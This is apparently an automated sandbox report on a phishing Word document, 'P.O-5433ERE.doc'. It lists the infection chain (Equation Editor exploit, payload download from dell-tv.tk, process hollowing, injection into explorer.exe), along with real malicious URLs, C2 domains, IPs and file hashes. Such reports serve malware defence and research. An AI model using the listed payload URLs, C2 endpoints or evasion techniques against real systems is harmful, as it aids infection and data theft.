Default Accounts | Exploitation for Client Execution 13 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 1 | LSASS Memory | Process Discovery 2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 14 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 31 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 612 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 123 | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | File and Directory Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 4 | Cached Domain Credentials | System Information Discovery 113 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 13 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |

          Behavior Graph

Behavior Graph ID: 528734 | Sample: P.O-5433ERE.doc | Startdate: 25/11/2021 | Architecture: WINDOWS | Score: 100
(The graph image is not reproduced; the process chain and node annotations recovered from it are listed below.)
• Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 12 other signatures
• WINWORD.EXE started; dropped ~WRF{3D999299-2169...1-6FEE86AD4ADA}.tmp (Composite)
• EQNEDT32.EXE started; contacted dell-tv.tk (37.0.9.166, ports 49165, 80, WKD-ASIE, Netherlands); dropped C:\Users\user\AppData\...\ashlkyvc7592.exe (PE32) and C:\Users\user\AppData\...\ashlyzx[1].exe (PE32); signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802); started ashlkyvc7592.exe
• ashlkyvc7592.exe: Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes; started a second ashlkyvc7592.exe
• ashlkyvc7592.exe (second instance): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection); injected into explorer.exe
• explorer.exe (injected): contacted www.texaszephyr.com, www.volunteervabetweenk.com (172.67.184.102, ports 49169, 80, CLOUDFLARENETUS, United States) and 6 other IPs or domains; System process connects to network (likely due to code injection or exploit); started cmstp.exe
• cmstp.exe: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; started cmd.exe


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          No Antivirus matches

          Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp | 100% | Avira | EXP/CVE-2017-11882.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp | 100% | Joe Sandbox ML |

          Unpacked PE Files

Source | Detection | Scanner | Label
5.0.ashlkyvc7592.exe.400000.10.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
5.0.ashlkyvc7592.exe.400000.8.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
5.2.ashlkyvc7592.exe.400000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
5.0.ashlkyvc7592.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

Source | Detection | Scanner | Label
texaszephyr.com | 0% | Virustotal |

          URLs

Source | Detection | Scanner | Label
http://wellformedweb.org/CommentAPI/ | 0% | URL Reputation | safe
http://www.texaszephyr.com/op9t/?0l=exlpTNNXh0F&c0=4uZm8lPh56XAYP0u1p0c6SVxcutgTZuNbzhe7MVeNR3LwnMhhkFBXHHvU8jy6jgZH7Gcyg== | 0% | Avira URL Cloud | safe
http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe
http://www.volunteervabetweenk.com/op9t/?0l=exlpTNNXh0F&c0=WMWbw9/24XbwIiPl+aU7TY/mYt55hlmFa8WJlEktQGdJQVklk58s/CKKr8Th7+7tz7UKpw== | 0% | Avira URL Cloud | safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
http://treyresearch.net | 0% | URL Reputation | safe
http://www.publicfigure.skin/op9t/?c0=RQ8pabDbnEWS4MHppDnLpAnnVm0R7EKmWqTB7JHuP07woLOWNs0JhuHKNBpScYVLrEmjjw==&0l=exlpTNNXh0F | 0% | Avira URL Cloud | safe
http://java.sun.com | 0% | URL Reputation | safe
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
http://dell-tv.tk/ashlyzx.exe | 0% | Avira URL Cloud | safe
http://computername/printers/printername/.printer | 0% | Avira URL Cloud | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe
www.fcusd4.com/op9t/ | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
dell-tv.tk | 37.0.9.166 | true | true | | unknown
publicfigure.skin | 34.102.136.180 | true | false | | unknown
www.volunteervabetweenk.com | 172.67.184.102 | true | true | | unknown
texaszephyr.com | 34.102.136.180 | true | false | | unknown
www.texaszephyr.com | unknown | unknown | true | | unknown
www.1oavyx.com | unknown | unknown | true | | unknown
www.bandhancustomer.com | unknown | unknown | true | | unknown
www.publicfigure.skin | unknown | unknown | true | | unknown

                        Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.texaszephyr.com/op9t/?0l=exlpTNNXh0F&c0=4uZm8lPh56XAYP0u1p0c6SVxcutgTZuNbzhe7MVeNR3LwnMhhkFBXHHvU8jy6jgZH7Gcyg== | false | Avira URL Cloud: safe | unknown
http://www.volunteervabetweenk.com/op9t/?0l=exlpTNNXh0F&c0=WMWbw9/24XbwIiPl+aU7TY/mYt55hlmFa8WJlEktQGdJQVklk58s/CKKr8Th7+7tz7UKpw== | true | Avira URL Cloud: safe | unknown
http://www.publicfigure.skin/op9t/?c0=RQ8pabDbnEWS4MHppDnLpAnnVm0R7EKmWqTB7JHuP07woLOWNs0JhuHKNBpScYVLrEmjjw==&0l=exlpTNNXh0F | false | Avira URL Cloud: safe | unknown
http://dell-tv.tk/ashlyzx.exe | true | Avira URL Cloud: safe | unknown
www.fcusd4.com/op9t/ | true | Avira URL Cloud: safe | low

                        URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.windows.com/pctv. | explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmp | false | | high
http://investor.msn.com | explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmp | false | | high
http://www.msnbc.com/news/ticker.txt | explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmp | false | | high
http://wellformedweb.org/CommentAPI/ | explorer.exe, 00000006.00000000.516217936.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.451173882.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1 | explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmp | false | | high
http://www.iis.fhg.de/audioPA | explorer.exe, 00000006.00000000.451173882.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM | explorer.exe, 00000006.00000000.451072374.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.516156334.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443806201.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.433262826.00000000045D6000.00000004.00000001.sdmp | false | | high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | explorer.exe, 00000006.00000000.512665035.0000000002CC7000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmp | false | | high
http://treyresearch.net | explorer.exe, 00000006.00000000.516217936.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.451173882.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2 | explorer.exe, 00000006.00000000.442612766.0000000003DF8000.00000004.00000001.sdmp | false | | high
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | explorer.exe, 00000006.00000000.512665035.0000000002CC7000.00000002.00020000.sdmp | false | | high
http://java.sun.com | explorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
http://www.icra.org/vocabulary/. | explorer.exe, 00000006.00000000.512665035.0000000002CC7000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://www.msn.com/de-de/?ocid=iehpC | explorer.exe, 00000006.00000000.450689751.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514669026.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432749870.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443479778.000000000449C000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | explorer.exe, 00000006.00000000.439681149.0000000001BE0000.00000002.00020000.sdmp | false | | high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | explorer.exe, 00000006.00000000.450661443.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438489061.000000000845A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.446213289.0000000008426000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432704474.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.515608032.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438411780.00000000083C9000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443456223.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmp | false | | high
http://investor.msn.com/ | explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmp | false | | high
http://www.msn.com/?ocid=iehp | explorer.exe, 00000006.00000000.450689751.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514669026.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432749870.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443479778.000000000449C000.00000004.00000001.sdmp | false | | high
http://www.msn.com/de-de/?ocid=iehp | explorer.exe, 00000006.00000000.450689751.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514669026.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432749870.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443479778.000000000449C000.00000004.00000001.sdmp | false | | high
http://www.piriform.com/ccleaner | explorer.exe, 00000006.00000000.450661443.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438489061.000000000845A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443564000.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.446213289.0000000008426000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432704474.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.450764826.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432948850.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.515608032.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438411780.00000000083C9000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443456223.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmp | false | | high
http://computername/printers/printername/.printer | explorer.exe, 00000006.00000000.451173882.0000000004650000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low
http://www.%s.comPA | explorer.exe, 00000006.00000000.439681149.0000000001BE0000.00000002.00020000.sdmp | false | URL Reputation: safe | low
http://www.autoitscript.com/autoit3 | explorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmp | false | | high
https://support.mozilla.org | explorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmp | false | | high
http://www.msn.com/?ocid=iehp0 | explorer.exe, 00000006.00000000.450689751.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514669026.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432749870.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443479778.000000000449C000.00000004.00000001.sdmp | false | | high
http://servername/isapibackend.dll | explorer.exe, 00000006.00000000.442701106.0000000003E50000.00000002.00020000.sdmp, cmd.exe, 00000008.00000002.466348639.0000000001BD0000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low

                                                            Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
172.67.184.102 | www.volunteervabetweenk.com | United States | 13335 | CLOUDFLARENETUS | true
34.102.136.180 | publicfigure.skin | United States | 15169 | GOOGLEUS | false
37.0.9.166 | dell-tv.tk | Netherlands | 198301 | WKD-ASIE | true

                                                            Private

                                                            IP
                                                            192.168.2.255

                                                            General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 528734
Start date: 25.11.2021
Start time: 18:07:48
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 58s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: P.O-5433ERE.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winDOC@9/9@6/4
EGA Information: Failed
HDC Information:
• Successful, ratio: 22.5% (good quality ratio 21%)
• Quality average: 74.3%
• Quality standard deviation: 29.9%
HCA Information:
• Successful, ratio: 91%
• Number of executed functions: 83
• Number of non-executed functions: 45
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .doc
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 144.91.75.9
• Excluded domains from analysis (whitelisted): sevensummitclimbing.com, www.sevensummitclimbing.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtQueryAttributesFile calls found.

                                                            Simulations

                                                            Behavior and APIs

Time | Type | Description
18:08:17 | API Interceptor | 179x Sleep call for process: EQNEDT32.EXE modified
18:08:24 | API Interceptor | 55x Sleep call for process: ashlkyvc7592.exe modified
18:08:45 | API Interceptor | 95x Sleep call for process: cmstp.exe modified
18:10:00 | API Interceptor | 1x Sleep call for process: explorer.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

Match: 37.0.9.166

Associated Sample Name / URL | Detection | Context
Quotation No. Q07387.doc | malicious | dell-tv.tk/templezx.exe
Swift Copy TT.doc | malicious | dell-tv.tk/xzx.exe
Order ID 1426095239.doc | malicious | kizitox.ga/mazx.exe
PAYMENT2021A0087NOV.doc | malicious | kizitox.ga/chriszx.exe
Temp Order2.exe | malicious | drossmnfg.com/stallion/index.php
Rev_NN doccument.doc | malicious | samsung-tv.tk/hussanzx.exe
20211122.doc | malicious | samsung-tv.tk/famzx.exe
PO-20212222.doc | malicious | samsung-tv.tk/obizx.exe
BANK DETAILS.doc | malicious | kizitox.ga/mazx.exe
50% TT advance copy.doc | malicious | kizitox.ga/ugopoundzx.exe
Drawing-FS3589_Surra-Unprice BOQ - Lock file - 28.1.2021.xlsx 788K.doc | malicious | kizitox.ga/mpomzx.exe
PURCHASE ORDER.doc | malicious | kizitox.ga/chriszx.exe
DHL AWB TRACKING DETAILS.doc | malicious | kizitox.ga/okeyzx.exe
items.doc | malicious | samsung-tv.tk/arinzezx.exe
my orderPDF.exe | malicious | drossmnfg.com/stallion/index.php
Order Speficications.doc | malicious | samsung-tv.tk/urchzx.exe
temp order (2).exe | malicious | drossmnfg.com/stallion/index.php
444order.doc | malicious | kizitox.ga/doziezx.exe
SCANNED DOCUMENT.doc | malicious | samsung-tv.tk/obizx.exe
HOLLAND - TEKL#U0130F MEKTUBU - 19,11,2021 - T.D.doc | malicious | kizitox.ga/chungzx.exe

                                                            Domains

Match: dell-tv.tk

Associated Sample Name / URL | Detection | Context
Quotation No. Q07387.doc | malicious | 37.0.9.166
Swift Copy TT.doc | malicious | 37.0.9.166
nwamafour.exe | malicious | 162.215.241.145
nwamafour.exe | malicious | 162.215.241.145
WeChat image_20210422104940_PDF.exe | malicious | 162.215.241.145

                                                            ASN

Match: CLOUDFLARENETUS

Associated Sample Name / URL | Detection | Context
Quotation No. Q07387.doc | malicious | 104.21.19.200
hSlk750R2b.exe | malicious | 104.23.98.190
Order Contract_signed (2NQ39NGAY0GD).ppam | malicious | 104.16.203.237
Halbank Ekstre 2021101 073653 270424.exe | malicious | 172.67.188.154
Hong Jin International Co Ltd -Order Specification.exe | malicious | 104.21.19.200
ORDER PROPOSAL.exe | malicious | 162.159.134.233
8p2NlqFgew.exe | malicious | 162.159.135.233
TT COPY_02101011.exe | malicious | 172.67.158.42
GZ4OR9sIdP.exe | malicious | 172.67.188.154
4lWWTrEJuS.exe | malicious | 104.21.31.203
TT_SWIFT_Export Order_noref S10SMG00318021.exe | malicious | 23.227.38.74
TxIDbatch#7809.htm | malicious | 104.16.18.94
Se adjunta el pedido, proforma.exe | malicious | 162.159.134.233
Google_Play_Store_flow_split.apk | malicious | 104.21.4.48
Statement.html | malicious | 104.16.18.94
Employee payment plan.HTM | malicious | 104.18.10.207
S9yf6BkjhTQUbHE.exe | malicious | 172.67.178.31
Halbank Ekstre 2021101 073653 270424.exe | malicious | 172.67.188.154
yH8giB6jJ2.exe | malicious | 162.159.135.233
pwY5ozOzpY | malicious | 172.64.209.6

Match: WKD-ASIE

Associated Sample Name / URL | Detection | Context
Quotation No. Q07387.doc | malicious | 37.0.9.166
0VDGA4mWCE.exe | malicious | 37.0.10.250
Payment+Advice.doc | malicious | 37.0.11.230
Swift Copy TT.doc | malicious | 37.0.9.166
Invitation PQ Documents Submission QTN.(#U007eMB).doc | malicious | 37.0.11.230
PO201808143_330542IMG_20200710_0008.rtf | malicious | 37.0.11.230
874578.doc | malicious | 37.0.11.230
2020 year financial report.doc | malicious | 37.0.11.230
Payment Advice.doc | malicious | 37.0.11.230
PO 36457967.doc | malicious | 37.0.11.230
QUOTE20212411.doc | malicious | 37.0.11.230
Order ID 1426095239.doc | malicious | 37.0.9.166
PAYMENT2021A0087NOV.doc | malicious | 37.0.9.166
Temp Order2.exe | malicious | 37.0.9.166
162AB00C0E943F9548B04F3437867508656480585369C.exe | malicious | 37.0.11.8
Rev_NN doccument.doc | malicious | 37.0.9.166
20211122.doc | malicious | 37.0.9.166
PO-20212222.doc | malicious | 37.0.9.166
BANK DETAILS.doc | malicious | 37.0.9.166
50% TT advance copy.doc | malicious | 37.0.9.166

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ashlyzx[1].exe
Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: downloaded
Size (bytes): 560128
Entropy (8bit): 7.648991597743519
Encrypted: false
SSDEEP: 12288:XBzcmhiTopuBWTgKY6VnDe9k2X9/KPMsh8S7P/TyjixBFmRq:XBomhisIWAIDe9HtK1h8Srbyji1Wq
MD5: D236BB1F86CAEC110ABB20FC2360E25B
SHA1: 0611498ED409D30150D2A0B2A6426E5CB9504D8A
SHA-256: 2F08F5B23A062671FBA5957B98D05A728299BB1AE98695B9B5D36E75528CCAB7
SHA-512: 4F1B645A4710291C197F25E7C7258D5D4D2F710607412228DEBA8D7A1C172FDD6D82DB2C791C6D6064E405AA577DDC1BF469D6EB8C2241A0ACB068A31F3490D1
Malicious: true
Reputation: low
IE Cache URL: http://dell-tv.tk/ashlyzx.exe
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a..............0.................. ........@.. ....................................@....................................O.......p............................................................................ ............... ..H............text...t.... ...................... ..`.rsrc...p...........................@..@.reloc..............................@..B........................H........H...!..........dj..`4............................................s....}.....s ...}.....(!....(.....{.....o"...*.0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(*...-...........o.....*..................{....o+....{....o,...o-.....}....*.0..)........{.........(....t......|......(...+...3.*....0..)........{.........(0...t......|......(...+...3.*....0..........
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: Composite Document File V2 Document, Cannot read section info
Category: dropped
Size (bytes): 5632
Entropy (8bit): 4.139240799996483
Encrypted: false
SSDEEP: 48:roMMP9awF8kcQNxFYCiMjbi3sAT3ZMidDs9n5bSUEppRu+:/MPD8kcYHJjezIENdl
MD5: B020D2CE44C467E09C418C1F777299A6
SHA1: D0394BC7ED85C851703043A84F028B3CA6C47B5B
SHA-256: 2A81E3D4E24096064B48F6E027444A37E9FADD9375DD5ADCDD69AED75F847769
SHA-512: 5E89FD1536298E0D1AEA1C9C2A5C6744CFC52F4830C0CBCA7A828912067972502AAA069EC94B1C0746FB5A9696C13F84A1865DD9A721D02C9857E934C2B3C6E5
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: low
Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1301DF5A-9B1F-4290-90EE-2E8BF9838615}.tmp
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 1024
Entropy (8bit): 0.05390218305374581
Encrypted: false
SSDEEP: 3:ol3lYdn:4Wn
MD5: 5D4D94EE7E06BBB0AF9584119797B23A
SHA1: DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256: 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512: 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious: false
Reputation: high, very likely benign file
Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{780FD6C6-AC2E-47FB-9E8C-CE3647E85B1F}.tmp
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 16896
Entropy (8bit): 3.570527510134586
Encrypted: false
SSDEEP: 384:8BuQrm+Mk+CkPYTJxgdHjGdIfZ3fbTreF8FNWZ:8EQKvk+BPYl9Kvz/WZ
MD5: D7466498EA7397EC632CB793A4B67FB8
SHA1: EA7FABB10EE13095DD52A380F1C9D3130714D58A
SHA-256: F09706A2416ABDA332F431EE91348A088DBF4F8D6F0702CCAFF28B8EB5A6CF32
SHA-512: F0638D0187B7B7F48262298C84A18B63E381C096CE78A65ED7E72EBD166C1E62D386E1B0B562021C4F218BE36C1C7F79A148E51ADE663A3E365E2738C7B3D40D
Malicious: false
Reputation: low
Preview: '.=.?...&.=.+...?.2.4.>.[./.^.!.2.-.|.?.?.?.|.$.?.%.^.%.*.`.+.9.,.#.?.?.%.8.6...?.#.<.'.;.+.6.|.'.0.+.%.@.|._._.'.6.,.|...<.7.`._.(.<.0.0.=.9.;.&...2.&.=.=.?.(.?.1.>.#...4.-.~._.2.?.~.(.4./.|.0...,.].|...(.?.?...1.?.@.<.~.'.?.'._.|.?.4.].[.&.@.$.?.#.?.?.&.^.@.).;.|.(.].3.~.`._.<.?.,.`.5.~.(.`.7.-.?.>.;.(.).<.^.+.^.!.,.4.6.~.7.7.]./._.?.#.0.2.,.:.?.].|.8.|.].4...^.].&.|.?.%._.9.%.?.4.).3...~.4.?...?.^.&.[.$.?.;.?.=.&.%.5...@...;.~.>.;.?.%...4.%.?.&.;.).:.(.;.+.$.3.[.?.0.?...3.[.?.1.1.../.2...]...7.2.3...>.;.0.5...=.:.1.*.].=.?.2.*.?.?.?.*.[...|.?.&.;.;.?.).7.?.'.%.[.'.%.8.?.6.%...?.7.#.'.9.3.).$.;.?.;.4.3.].&.!.$.#.4.?...?.^.%.?.3.*.'.[.?.5.(./.%.?.^.&.'.'.$.~.@.9.1.^.9.).6.|.^.>.>.;.&.6.>.#.*.4.!.&.:.`././.1.[.6.1.0.~.:...`.?.1.]./.~.-.+.?.%.?.?.?.0.~.?.~.0.,.4.~...?.?.=.%.?.%.`.|.&.|.$.+.:.?.4.%.?.8._.1.;.8.1.9.?.~...?.).?..._.7.-.~.^.=.$._.?.?.~...].......1.).=.!.0.4...:.4.*.2.1.'.2.7.)...~.?.8.$.....:.3.)./.1.~._.?.!.4.:.9.:.!..._.#.>.@.<...!.!...;.=.&.:.~.^.:.%.0.?.8.;...~.!.+.=.1.
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\P.O-5433ERE.LNK
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:57 2021, mtime=Mon Aug 30 20:08:57 2021, atime=Fri Nov 26 01:08:15 2021, length=21635, window=hide
Category: dropped
Size (bytes): 1019
Entropy (8bit): 4.530153378570899
Encrypted: false
SSDEEP: 24:8CNeq7k/XTuzLIvcNe9sgmDv3q6iQd7Qy:8CNeq7k/XTkIcNgzttUj
MD5: 9892E2ECCDB56857139B89D1CC41DE9B
SHA1: B0965C6B38F9190AB9FDA1770B43F5F5E5D746FE
SHA-256: 896A255ACA90326B2CAAA3F51EB0AB779DA76525EF9FD3232CCD910DAA9787D8
SHA-512: 8778AFD4B7FF99A07DEF6495861076998BB6BC566465E36AF84414B164B6577B36825B629F0B3C78D60661FDE9A5B094DEC90B14EA0DF4F9EDE8EE17B0C2D3BE
Malicious: false
Reputation: low
